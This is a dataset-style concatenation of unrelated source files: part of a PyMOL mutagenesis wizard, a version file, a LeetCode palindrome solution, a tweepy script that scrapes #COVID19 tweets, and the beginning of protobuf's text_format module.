"(name N & resn NME+NHH | name C & resn ACE))" % (src_sele, tmp_sele1))
# create the merged molecule
cmd.create(new_name, "?%s | ?%s" % (new_name, tmp_obj2), state, state)
# now connect them
cmd.select(tmp_sele2, '/%s/%s/%s/%s' % ((new_name,) + self.stored.identifiers[:3]))
cmd.bond('?%s & name C' % (tmp_sele1), '?%s & name N' % (tmp_sele2), quiet=1)
cmd.bond('?%s & name N' % (tmp_sele1), '?%s & name C' % (tmp_sele2), quiet=1)
cmd.set_geometry('(?%s | ?%s) & name C+N' % (tmp_sele1, tmp_sele2), 3, 3) # make amide planer
# fix N-H hydrogen position (if any exists)
cmd.h_fix('?%s & name N' % (tmp_sele2))
# delete temporary objects/selections
cmd.delete(tmp_sele1)
cmd.delete(tmp_sele2)
cmd.delete(tmp_obj2)
self.clear()
# and return to frame 1
cmd.frame(1)
cmd.refresh_wizard()
else:
# create copy with conformation in correct state
cmd.create(tmp_obj2,obj_name,src_frame,1)
# remove existing c-cap in copy (if any)
cmd.remove("byres (name N and (%s in (neighbor %s)) and resn NME+NHH)"%
(new_name,src_sele))
cmd.remove("(%s) and name OXT"%src_sele)
# remove existing n-cap in copy (if any)
cmd.remove("byres (name C and (%s in (neighbor %s)) and resn ACE)"%
(new_name,src_sele))
# save existing conformation on undo stack
# cmd.edit("((%s in %s) and name ca)"%(new_name,src_sele))
cmd.push_undo("("+src_sele+")")
# modify the conformation
cmd.update(new_name,tmp_obj2)
# cmd.unpick()
cmd.delete(tmp_obj2)
self.clear()
# and return to frame 1
cmd.frame(1)
cmd.refresh_wizard()
cmd.set('auto_zoom',auto_zoom,quiet=1)
def get_prompt(self):
self.prompt = None
if self.status==0:
self.prompt = [ 'Pick a residue...']
elif self.status==1:
self.prompt = [ 'Select a rotamer for %s or pick a new residue...'%self.res_text ]
return self.prompt
def do_library(self):
cmd=self.cmd
pymol=cmd._pymol
if not ((cmd.count_atoms("(%s) and name N"%src_sele)==1) and
(cmd.count_atoms("(%s) and name C"%src_sele)==1) and
(cmd.count_atoms("(%s) and name O"%src_sele)==1)):
self.clear()
return 1
cmd.feedback("push")
cmd.feedback("disable","selector","everythin")
cmd.feedback("disable","editor","actions")
self.prompt = [ 'Loading rotamers...']
self.bump_scores = []
state_best = 0
pymol.stored.name = 'residue'
cmd.iterate("first (%s)"%src_sele,'stored.name=model+"/"+segi+"/"+chain+"/"+resn+"`"+resi')
self.res_text = pymol.stored.name
cmd.select("_seeker_hilight",src_sele)
auto_zoom = cmd.get_setting_text('auto_zoom')
cmd.set('auto_zoom',"0",quiet=1)
cmd.frame(0)
cmd.delete(frag_name)
if self.auto_center:
cmd.center(src_sele,animate=-1)
self.lib_mode = self.mode
if self.lib_mode=="current":
pymol.stored.resn=""
cmd.iterate("(%s & name CA)"%src_sele,"stored.resn=resn")
rot_type = _rot_type_xref.get(pymol.stored.resn,pymol.stored.resn)
if (self.c_cap!='none') or (self.n_cap!='none') or (self.hyd != 'auto'):
self.lib_mode = rot_type # force fragment-based load
else:
cmd.create(frag_name,src_sele,1,1)
if self.c_cap=='open':
cmd.remove("%s and name OXT"%frag_name)
if self.lib_mode!='current':
rot_type = self.lib_mode
frag_type = self.lib_mode
if (self.n_cap == 'posi') and (frag_type[0:3]!='NT_'):
if not ( cmd.count_atoms(
"elem C & !(%s) & (bto. (name N & (%s))) &! resn ACE"%
(src_sele,src_sele))):
# use N-terminal fragment
frag_type ="NT_"+frag_type
if (self.c_cap == 'nega') and (frag_type[0:3]!='CT_'):
if not ( cmd.count_atoms("elem N & !(%s) & (bto. (name C & (%s))) & !resn NME+NHH"%
(src_sele,src_sele))):
# use C-terminal fragment
frag_type ="CT_"+frag_type
if rot_type[0:3] in [ 'NT_', 'CT_' ]:
rot_type = rot_type[3:]
rot_type = _rot_type_xref.get(rot_type, rot_type)
cmd.fragment(frag_type.lower(), frag_name, origin=0)
# trim off hydrogens
if (self.hyd == 'none'):
cmd.remove("("+frag_name+" and hydro)")
elif (self.hyd == 'auto'):
if cmd.count_atoms("("+src_sele+") and hydro")==0:
cmd.remove("("+frag_name+" and hydro)")
# copy identifying information
cmd.alter("?%s & name CA" % src_sele, "stored.identifiers = (segi, chain, resi, ss, color)", space=self.space)
cmd.alter("?%s" % frag_name, "(segi, chain, resi, ss) = stored.identifiers[:4]", space=self.space)
# move the fragment
if ((cmd.count_atoms("(%s & name CB)"%frag_name)==1) and
(cmd.count_atoms("(%s & name CB)"%src_sele)==1)):
cmd.pair_fit("(%s & name CA)"%frag_name,
"(%s & name CA)"%src_sele,
"(%s & name CB)"%frag_name,
"(%s & name CB)"%src_sele,
"(%s & name C)"%frag_name,
"(%s & name C)"%src_sele,
"(%s & name N)"%frag_name,
"(%s & name N)"%src_sele)
else:
cmd.pair_fit("(%s & name CA)"%frag_name,
"(%s & name CA)"%src_sele,
"(%s & name C)"%frag_name,
"(%s & name C)"%src_sele,
"(%s & name N)"%frag_name,
"(%s & name N)"%src_sele)
# fix the carbonyl position...
cmd.iterate_state(1,"(%s & name O)"%src_sele,"stored.list=[x,y,z]")
cmd.alter_state(1,"(%s & name O)"%frag_name,"(x,y,z)=stored.list")
if cmd.count_atoms("(%s & name OXT)"%src_sele):
cmd.iterate_state(1,"(%s & name OXT)"%src_sele,"stored.list=[x,y,z]")
cmd.alter_state(1,"(%s & name OXT)"%frag_name,"(x,y,z)=stored.list")
elif cmd.count_atoms("(%s & name OXT)"%frag_name): # place OXT if no template exists
angle = cmd.get_dihedral("(%s & name N)"%frag_name,
"(%s & name CA)"%frag_name,
"(%s & name C)"%frag_name,
"(%s & name O)"%frag_name)
cmd.protect("(%s & name O)"%frag_name)
cmd.set_dihedral("(%s & name N)"%frag_name,
"(%s & name CA)"%frag_name,
"(%s & name C)"%frag_name,
"(%s & name OXT)"%frag_name,180.0+angle)
cmd.deprotect(frag_name)
# fix the hydrogen position (if any)
if cmd.count_atoms("(hydro and bound_to (name N & (%s)))"%frag_name)==1:
if cmd.count_atoms("(hydro and bound_to (name N & (%s)))"%src_sele)==1:
cmd.iterate_state(1,"(hydro and bound_to (name N & (%s)))"%src_sele,
"stored.list=[x,y,z]")
cmd.alter_state(1,"(hydro and bound_to (name N & (%s)))"%frag_name,
"(x,y,z)=stored.list")
elif cmd.select(tmp_sele1,"(name C & bound_to (%s and elem N))"%src_sele)==1:
# position hydro based on location of the carbonyl
angle = cmd.get_dihedral("(%s & name C)"%frag_name,
"(%s & name CA)"%frag_name,
"(%s & name N)"%frag_name,
tmp_sele1)
cmd.set_dihedral("(%s & name C)"%frag_name,
"(%s & name CA)"%frag_name,
"(%s & name N)"%frag_name,
"(%s & name H)"%frag_name,180.0+angle)
cmd.delete(tmp_sele1)
# add c-cap (if appropriate)
if self.c_cap in [ 'amin', 'nmet' ]:
if not cmd.count_atoms("elem N & !(%s) & (bto. (name C & (%s))) & !resn NME+NHH"%
(src_sele,src_sele)):
if cmd.count_atoms("name C & (%s)"%(frag_name))==1:
if self.c_cap == 'amin':
editor.attach_amino_acid("name C & (%s)"%(frag_name), 'nhh')
elif self.c_cap == 'nmet':
editor.attach_amino_acid("name C & (%s)"%(frag_name), 'nme')
if cmd.count_atoms("hydro & bound_to (name N & bound_to (name C & (%s)))"%frag_name):
cmd.h_fix("name N & bound_to (name C & (%s))"%frag_name)
# trim hydrogens
if (self.hyd == 'none'):
cmd.remove("("+frag_name+" and hydro)")
elif (self.hyd == 'auto'):
if cmd.count_atoms("("+src_sele+") and hydro")==0:
cmd.remove("("+frag_name+" and hydro)")
# add n-cap (if appropriate)
if self.n_cap in [ 'acet' ]:
if not cmd.count_atoms("elem C & !(%s) & (bto. (name N & (%s))) & !resn ACE "%
(src_sele,src_sele)):
if cmd.count_atoms("name N & (%s)"%(frag_name))==1:
if self.n_cap == 'acet':
editor.attach_amino_acid("name N & (%s)"%(frag_name), 'ace')
if cmd.count_atoms("hydro & bound_to (name N & bound_to (name C & (%s)))"%frag_name):
cmd.h_fix("name N & (%s)"%frag_name)
# trim hydrogens
if (self.hyd == 'none'):
cmd.remove("("+frag_name+" and hydro)")
elif (self.hyd == 'auto'):
if cmd.count_atoms("("+src_sele+") and hydro")==0:
cmd.remove("("+frag_name+" and hydro)")
cartoon = (cmd.count_atoms("(%s & name CA & rep cartoon)"%src_sele)>0)
sticks = (cmd.count_atoms("(%s & name CA & rep sticks)"%src_sele)>0)
cmd.delete(obj_name)
key = rot_type
lib = None
if self.dep == 'dep':
try:
result = cmd.phi_psi("%s"%src_sele)
if len(result)==1:
(phi,psi) = list(result.values())[0]
(phi,psi) = (int(10*round(phi/10)),int(10*(round(psi/10))))
key = (rot_type,phi,psi)
if key not in self.dep_library:
(phi,psi) = (int(20*round(phi/20)),int(20*(round(psi/20))))
key = (rot_type,phi,psi)
if key not in self.dep_library:
(phi,psi) = (int(60*round(phi/60)),int(60*(round(psi/60))))
key = (rot_type,phi,psi)
lib = self.dep_library.get(key,None)
except:
pass
if lib is None:
key = rot_type
lib = self.ind_library.get(key,None)
if (lib is not None) and self.dep == 'dep':
print(' Mutagenesis: no phi/psi, using backbone-independent rotamers.')
if lib is not None:
state = 1
for a in lib:
cmd.create(obj_name,frag_name,1,state)
if state == 1:
cmd.select(mut_sele,"(byres (%s like %s))"%(obj_name,src_sele))
if rot_type=='PRO':
cmd.unbond("(%s & name N)"%mut_sele,"(%s & name CD)"%mut_sele)
for b in a.keys():
if b!='FREQ':
cmd.set_dihedral("(%s & n;%s)"%(mut_sele,b[0]),
"(%s & n;%s)"%(mut_sele,b[1]),
"(%s & n;%s)"%(mut_sele,b[2]),
"(%s & n;%s)"%(mut_sele,b[3]),
a[b],state=state)
else:
cmd.set_title(obj_name,state,"%1.1f%%"%(a[b]*100))
if rot_type=='PRO':
cmd.bond("(%s & name N)"%mut_sele,"(%s & name CD)"%mut_sele)
state = state + 1
cmd.delete(frag_name)
print(" Mutagenesis: %d rotamers loaded."%len(lib))
if self.bump_check:
cmd.delete(bump_name)
cmd.create(bump_name,
"(((byobj %s) within 6 of (%s and not name N+C+CA+O+H+HA)) and (not (%s)))|(%s)"%
(src_sele,mut_sele,src_sele,mut_sele),singletons=1)
cmd.color("gray50",bump_name+" and elem C")
cmd.set("seq_view",0,bump_name,quiet=1)
cmd.hide("everything",bump_name)
if ((cmd.select(tmp_sele1, "(name N & (%s in (neighbor %s)))"%
(bump_name,src_sele)) == 1) and
(cmd.select(tmp_sele2, "(name C & (%s in %s))"%
(bump_name,mut_sele)) == 1)):
cmd.bond(tmp_sele1,tmp_sele2)
if ((cmd.select(tmp_sele1,"(name C & (%s in (neighbor %s)))"%
(bump_name,src_sele)) == 1) and
(cmd.select(tmp_sele2,"(name N & (%s in %s))"%
(bump_name,mut_sele)) == 1)):
cmd.bond(tmp_sele1,tmp_sele2)
cmd.delete(tmp_sele1)
cmd.delete(tmp_sele2)
cmd.protect("%s and not (%s in (%s and not name N+C+CA+O+H+HA))"%
(bump_name,bump_name,mut_sele))
cmd.sculpt_activate(bump_name)
cmd.show("cgo",bump_name)
# draw the bumps
cmd.set("sculpt_vdw_vis_mode",1,bump_name)
state = 1
score_best = 1e6
for a in lib:
score = cmd.sculpt_iterate(bump_name, state, 1)
self.bump_scores.append(score)
if score < score_best:
state_best = state
score_best = score
state = state + 1
cmd.delete(mut_sele)
else:
cmd.create(obj_name,frag_name,1,1)
print(" Mutagenesis: no rotamers found in library.")
cmd.set("seq_view",0,obj_name,quiet=1)
pymol.util.cbaw(obj_name)
cmd.hide("("+obj_name+")")
cmd.show(self.rep,obj_name)
cmd.show('lines',obj_name) #neighbor always show lines
if cartoon:
cmd.show("cartoon",obj_name)
if sticks:
cmd.show("sticks",obj_name)
cmd.set('auto_zoom',auto_zoom,quiet=1)
cmd.delete(frag_name)
cmd.frame(state_best)
# this might be redundant if frame(state_best) changed the state
self.do_state(state_best)
cmd.unpick()
cmd.feedback("pop")
def do_state(self,state):
cmd=self.cmd
if cmd.get("sculpting")=="on":
names = cmd.get_names("all_objects")
if (bump_name in names) and (obj_name in names):
cmd.update(bump_name,obj_name)
if self.bump_scores:
print(' Rotamer %d/%d, strain=%.2f' % (state,
cmd.count_states(obj_name), self.bump_scores[state - 1]))
# update hbonds (polar contacts)
cmd.delete(tmp_hbonds)
cmd.distance(tmp_hbonds,
"?{}".format(obj_name),
"(byobj ?{}) and not ?{}".format(src_sele, src_sele),
mode=2, state1=state, state2=1)
def do_select(self,selection):
print("Selected!")
cmd=self.cmd
if (obj_name in cmd.get_names()):
if cmd.count_atoms("(%s) and (%s)"%(obj_name,selection)):
cmd.deselect()
return 1
if self.status!=0:
cmd.delete(obj_name)
cmd.select(src_sele,selection)
cmd.unpick()
cmd.enable(src_sele)
self.status = 1
self.error = None
self.do_library()
cmd.delete(selection)
cmd.refresh_wizard()
cmd.deselect()
return 1
def do_pick(self,bondFlag):
print("Picked!")
cmd=self.cmd
if bondFlag:
self.error = "Error: please select an atom, not a bond."
print(self.error)
else:
if self.status!=0:
cmd.delete(obj_name)
cmd.select(src_sele,"(byres pk1)")
cmd.unpick()
cmd.enable(src_sele)
self.status = 1
self.error = None
self.do_library()
cmd.refresh_wizard()
| 39.927793 | 122 | 0.468148 |
72a799c3f3b53672f4d0be5528a7e2ca55d2566a | 1,139 | py | Python | user_sync/version.py | sabanawaf/user-sync.py | 51a7f9165d1740120b172edf507f1b3b3d5e57f8 | [
"MIT"
] | null | null | null | user_sync/version.py | sabanawaf/user-sync.py | 51a7f9165d1740120b172edf507f1b3b3d5e57f8 | [
"MIT"
] | null | null | null | user_sync/version.py | sabanawaf/user-sync.py | 51a7f9165d1740120b172edf507f1b3b3d5e57f8 | [
"MIT"
] | null | null | null | # Copyright (c) 2016-2017 Adobe Inc. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
__version__ = '2.4.2'
| 51.772727 | 80 | 0.775241 |
98074bd5fb28125a2d075874b342c834c7810ae3 | 523 | py | Python | code/Solution_0009_isPalindrome.py | qizhenkang/myLeetCode | cb9edce69567eba9d96ce756507a5a7ac6e74293 | [
"MIT"
] | null | null | null | code/Solution_0009_isPalindrome.py | qizhenkang/myLeetCode | cb9edce69567eba9d96ce756507a5a7ac6e74293 | [
"MIT"
] | null | null | null | code/Solution_0009_isPalindrome.py | qizhenkang/myLeetCode | cb9edce69567eba9d96ce756507a5a7ac6e74293 | [
"MIT"
] | null | null | null | class Solution:
def isPalindrome(self, x: int) -> bool:
result = False
y = x
x_p = 0
if x >= 0:
while y != 0:
x_p = x_p * 10 + y % 10
y = int(y / 10)
if x == x_p:
result = True
return result
if __name__ == '__main__':
solu = Solution()
# input_numRows = 2
input_Str = str(' -42 3sd')
# input_num = 11223
output_Str = 'result = ' + str(solu.isPalindrome(-10))
print(output_Str)
| 23.772727 | 58 | 0.460803 |
4559730fda304b2ab931bfc17c2a1b84111398a9 | 2,300 | py | Python | pws/scraper.py | zamys/pws | b26ddb12cbbb00ef3a337d8b5a8ef7dc051d4b13 | [
"MIT"
] | null | null | null | pws/scraper.py | zamys/pws | b26ddb12cbbb00ef3a337d8b5a8ef7dc051d4b13 | [
"MIT"
] | null | null | null | pws/scraper.py | zamys/pws | b26ddb12cbbb00ef3a337d8b5a8ef7dc051d4b13 | [
"MIT"
] | null | null | null | import keys
import tweepy
import datetime
import time
import jsonpickle
time_start = time.time()
#Authenticatie
key = keys.GetKeys()
auth = tweepy.OAuthHandler(key.consumer, key.consumer_secret)
auth.set_access_token(key.access_token, key.access_token_secret)
api = tweepy.API(auth)
#Hoeveel tweets worden opgeslagen per run
date_today = datetime.datetime.now() #datum van vandaag
tweets_per_query = 100 #Meer mag niet van twitter
tweets_max = 500 #Hoeveel tweets er totaal worden opgeslagen
file_name = 'tweets-'+ date_today.strftime('%d-%m-%y') +'.txt'
since_id = None
max_id = -1
tweet_count = 0
print("Download begint nu...")
#Scraper gaat zoeken naar:
search_query = "#COVID19"
with open(file_name,'w') as f:
print("Tweets met " + search_query + " worden gedownload.")
while(tweet_count<tweets_max):
try:
if(max_id<=0):
if(not since_id):
tweets_new = api.search(q=search_query,count=tweets_per_query,lang="en",tweet_mode='extended')
else:
tweets_new = api.search(q=search_query,count=tweets_per_query,lang="en",tweet_mode='extended',since_id=since_id)
else:
if(not since_id):
tweets_new = api.search(q=search_query,count=tweets_per_query,lang="en",tweet_mode='extended',max_id=str(max_id-1))
else:
tweets_new = api.search(q=search_query,count=tweets_per_query,lang="en",tweet_mode='extended',max_id=str(max_id-1),since_id=since_id)
#Als er geen nieuwe tweets zijn binnen gekomen:
if(not tweets_new):
print("Geen nieuwe tweets gevonden")
break
for tweet in tweets_new:
f.write(jsonpickle.encode(tweet._json,unpicklable=False)+'\n')
tweet_count += len(tweets_new)
print("{0} tweets zijn gedownload".format(tweet_count))
max_id = tweets_new[-1].id
except tweepy.TweepError as err:
print("Foutmelding: "+str(err))
break
time_end = time.time()
time_elapsed = time_end-time_start
print("{0} tweets zijn gedownload en zijn opgeslagen in {1}".format(tweet_count,file_name))
print("Het heeft {0} seconden geduurd".format(time_elapsed)) | 37.704918 | 153 | 0.653043 |
e4d10182ff87fb56988884cc61ae63704f69a03e | 994 | py | Python | scripts/disc_ssl_https.py | leshak/zabbix-ssl-nginx | efed212bbb17a32dddc9d30beb354c040ba63f65 | [
"MIT"
] | null | null | null | scripts/disc_ssl_https.py | leshak/zabbix-ssl-nginx | efed212bbb17a32dddc9d30beb354c040ba63f65 | [
"MIT"
] | null | null | null | scripts/disc_ssl_https.py | leshak/zabbix-ssl-nginx | efed212bbb17a32dddc9d30beb354c040ba63f65 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import crossplane
import json
NGINX_CONFIG_PATH = '/etc/nginx/nginx.conf'
HTTPS_PORT = 'ssl'
domainsList = []
nginxConfig = crossplane.parse(NGINX_CONFIG_PATH)
if nginxConfig['config']:
for cfile in nginxConfig['config']:
for parsed in cfile['parsed']:
if 'block' in parsed:
foundHttps = False
httpsDomain = None
for blk in parsed['block']:
if blk['directive'] == 'listen':
if HTTPS_PORT in blk['args']:
foundHttps = True
if foundHttps and blk['directive'] == 'server_name' and len(blk['args']) > 0:
httpsDomain = blk['args'][0]
if foundHttps and httpsDomain != None:
domainsList.append({
"{#DOMAIN_HTTPS}": httpsDomain
})
print(json.dumps({
'data': domainsList
}))
| 26.157895 | 97 | 0.512072 |
43ec89f1b417e6516f1bb26be4a9317302480397 | 21,689 | py | Python | earth_enterprise/src/google/protobuf-py/google/protobuf/text_format.py | ezeeyahoo/earthenterprise | b6cac9e6228946f2f17d1edb75e118aeb3e8e8c9 | [
"Apache-2.0"
] | 2,661 | 2017-03-20T22:12:50.000Z | 2022-03-30T09:43:19.000Z | earth_enterprise/src/google/protobuf-py/google/protobuf/text_format.py | ezeeyahoo/earthenterprise | b6cac9e6228946f2f17d1edb75e118aeb3e8e8c9 | [
"Apache-2.0"
] | 1,531 | 2017-03-24T17:20:32.000Z | 2022-03-16T18:11:14.000Z | earth_enterprise/src/google/protobuf-py/google/protobuf/text_format.py | ezeeyahoo/earthenterprise | b6cac9e6228946f2f17d1edb75e118aeb3e8e8c9 | [
"Apache-2.0"
] | 990 | 2017-03-24T11:54:28.000Z | 2022-03-22T11:51:47.000Z | # Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# http://code.google.com/p/protobuf/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Contains routines for printing protocol messages in text format."""
import cStringIO
import re
from collections import deque
from google.protobuf.internal import type_checkers
from google.protobuf import descriptor
__all__ = [ 'MessageToString', 'PrintMessage', 'PrintField',
'PrintFieldValue', 'Merge' ]
# Infinity and NaN are not explicitly supported by Python pre-2.6, and
# float('inf') does not work on Windows (pre-2.6).
_INFINITY = 1e10000 # overflows, thus will actually be infinity.
_NAN = _INFINITY * 0
class ParseError(Exception):
"""Thrown in case of ASCII parsing error."""
def MessageToString(message, as_utf8=False, as_one_line=False):
out = cStringIO.StringIO()
PrintMessage(message, out, as_utf8=as_utf8, as_one_line=as_one_line)
result = out.getvalue()
out.close()
if as_one_line:
return result.rstrip()
return result
def PrintMessage(message, out, indent=0, as_utf8=False, as_one_line=False):
for field, value in message.ListFields():
if field.label == descriptor.FieldDescriptor.LABEL_REPEATED:
for element in value:
PrintField(field, element, out, indent, as_utf8, as_one_line)
else:
PrintField(field, value, out, indent, as_utf8, as_one_line)
def PrintField(field, value, out, indent=0, as_utf8=False, as_one_line=False):
"""Print a single field name/value pair. For repeated fields, the value
should be a single element."""
out.write(' ' * indent);
if field.is_extension:
out.write('[')
if (field.containing_type.GetOptions().message_set_wire_format and
field.type == descriptor.FieldDescriptor.TYPE_MESSAGE and
field.message_type == field.extension_scope and
field.label == descriptor.FieldDescriptor.LABEL_OPTIONAL):
out.write(field.message_type.full_name)
else:
out.write(field.full_name)
out.write(']')
elif field.type == descriptor.FieldDescriptor.TYPE_GROUP:
# For groups, use the capitalized name.
out.write(field.message_type.name)
else:
out.write(field.name)
if field.cpp_type != descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
# The colon is optional in this case, but our cross-language golden files
# don't include it.
out.write(': ')
PrintFieldValue(field, value, out, indent, as_utf8, as_one_line)
if as_one_line:
out.write(' ')
else:
out.write('\n')
def PrintFieldValue(field, value, out, indent=0,
as_utf8=False, as_one_line=False):
"""Print a single field value (not including name). For repeated fields,
the value should be a single element."""
if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
if as_one_line:
out.write(' { ')
PrintMessage(value, out, indent, as_utf8, as_one_line)
out.write('}')
else:
out.write(' {\n')
PrintMessage(value, out, indent + 2, as_utf8, as_one_line)
out.write(' ' * indent + '}')
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_ENUM:
out.write(field.enum_type.values_by_number[value].name)
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_STRING:
out.write('\"')
if type(value) is unicode:
out.write(_CEscape(value.encode('utf-8'), as_utf8))
else:
out.write(_CEscape(value, as_utf8))
out.write('\"')
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_BOOL:
if value:
out.write("true")
else:
out.write("false")
else:
out.write(str(value))
def Merge(text, message):
"""Merges an ASCII representation of a protocol message into a message.
Args:
text: Message ASCII representation.
message: A protocol buffer message to merge into.
Raises:
ParseError: On ASCII parsing problems.
"""
tokenizer = _Tokenizer(text)
while not tokenizer.AtEnd():
_MergeField(tokenizer, message)
def _MergeField(tokenizer, message):
"""Merges a single protocol message field into a message.
Args:
tokenizer: A tokenizer to parse the field name and values.
message: A protocol message to record the data.
Raises:
ParseError: In case of ASCII parsing problems.
"""
message_descriptor = message.DESCRIPTOR
if tokenizer.TryConsume('['):
name = [tokenizer.ConsumeIdentifier()]
while tokenizer.TryConsume('.'):
name.append(tokenizer.ConsumeIdentifier())
name = '.'.join(name)
if not message_descriptor.is_extendable:
raise tokenizer.ParseErrorPreviousToken(
'Message type "%s" does not have extensions.' %
message_descriptor.full_name)
field = message.Extensions._FindExtensionByName(name)
if not field:
raise tokenizer.ParseErrorPreviousToken(
'Extension "%s" not registered.' % name)
elif message_descriptor != field.containing_type:
raise tokenizer.ParseErrorPreviousToken(
'Extension "%s" does not extend message type "%s".' % (
name, message_descriptor.full_name))
tokenizer.Consume(']')
else:
name = tokenizer.ConsumeIdentifier()
field = message_descriptor.fields_by_name.get(name, None)
# Group names are expected to be capitalized as they appear in the
# .proto file, which actually matches their type names, not their field
# names.
if not field:
field = message_descriptor.fields_by_name.get(name.lower(), None)
if field and field.type != descriptor.FieldDescriptor.TYPE_GROUP:
field = None
if (field and field.type == descriptor.FieldDescriptor.TYPE_GROUP and
field.message_type.name != name):
field = None
if not field:
raise tokenizer.ParseErrorPreviousToken(
'Message type "%s" has no field named "%s".' % (
message_descriptor.full_name, name))
if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
tokenizer.TryConsume(':')
if tokenizer.TryConsume('<'):
end_token = '>'
else:
tokenizer.Consume('{')
end_token = '}'
if field.label == descriptor.FieldDescriptor.LABEL_REPEATED:
if field.is_extension:
sub_message = message.Extensions[field].add()
else:
sub_message = getattr(message, field.name).add()
else:
if field.is_extension:
sub_message = message.Extensions[field]
else:
sub_message = getattr(message, field.name)
sub_message.SetInParent()
while not tokenizer.TryConsume(end_token):
if tokenizer.AtEnd():
raise tokenizer.ParseErrorPreviousToken('Expected "%s".' % (end_token))
_MergeField(tokenizer, sub_message)
else:
_MergeScalarField(tokenizer, message, field)
def _MergeScalarField(tokenizer, message, field):
"""Merges a single protocol message scalar field into a message.
Args:
tokenizer: A tokenizer to parse the field value.
message: A protocol message to record the data.
field: The descriptor of the field to be merged.
Raises:
ParseError: In case of ASCII parsing problems.
RuntimeError: On runtime errors.
"""
tokenizer.Consume(':')
value = None
if field.type in (descriptor.FieldDescriptor.TYPE_INT32,
descriptor.FieldDescriptor.TYPE_SINT32,
descriptor.FieldDescriptor.TYPE_SFIXED32):
value = tokenizer.ConsumeInt32()
elif field.type in (descriptor.FieldDescriptor.TYPE_INT64,
descriptor.FieldDescriptor.TYPE_SINT64,
descriptor.FieldDescriptor.TYPE_SFIXED64):
value = tokenizer.ConsumeInt64()
elif field.type in (descriptor.FieldDescriptor.TYPE_UINT32,
descriptor.FieldDescriptor.TYPE_FIXED32):
value = tokenizer.ConsumeUint32()
elif field.type in (descriptor.FieldDescriptor.TYPE_UINT64,
descriptor.FieldDescriptor.TYPE_FIXED64):
value = tokenizer.ConsumeUint64()
elif field.type in (descriptor.FieldDescriptor.TYPE_FLOAT,
descriptor.FieldDescriptor.TYPE_DOUBLE):
value = tokenizer.ConsumeFloat()
elif field.type == descriptor.FieldDescriptor.TYPE_BOOL:
value = tokenizer.ConsumeBool()
elif field.type == descriptor.FieldDescriptor.TYPE_STRING:
value = tokenizer.ConsumeString()
elif field.type == descriptor.FieldDescriptor.TYPE_BYTES:
value = tokenizer.ConsumeByteString()
elif field.type == descriptor.FieldDescriptor.TYPE_ENUM:
# Enum can be specified by a number (the enum value), or by
# a string literal (the enum name).
enum_descriptor = field.enum_type
if tokenizer.LookingAtInteger():
number = tokenizer.ConsumeInt32()
enum_value = enum_descriptor.values_by_number.get(number, None)
if enum_value is None:
raise tokenizer.ParseErrorPreviousToken(
'Enum type "%s" has no value with number %d.' % (
enum_descriptor.full_name, number))
else:
identifier = tokenizer.ConsumeIdentifier()
enum_value = enum_descriptor.values_by_name.get(identifier, None)
if enum_value is None:
raise tokenizer.ParseErrorPreviousToken(
'Enum type "%s" has no value named %s.' % (
enum_descriptor.full_name, identifier))
value = enum_value.number
else:
raise RuntimeError('Unknown field type %d' % field.type)
if field.label == descriptor.FieldDescriptor.LABEL_REPEATED:
if field.is_extension:
message.Extensions[field].append(value)
else:
getattr(message, field.name).append(value)
else:
if field.is_extension:
message.Extensions[field] = value
else:
setattr(message, field.name, value)
class _Tokenizer(object):
"""Protocol buffer ASCII representation tokenizer.
This class handles the lower level string parsing by splitting it into
meaningful tokens.
It was directly ported from the Java protocol buffer API.
"""
_WHITESPACE = re.compile('(\\s|(#.*$))+', re.MULTILINE)
_TOKEN = re.compile(
'[a-zA-Z_][0-9a-zA-Z_+-]*|' # an identifier
'[0-9+-][0-9a-zA-Z_.+-]*|' # a number
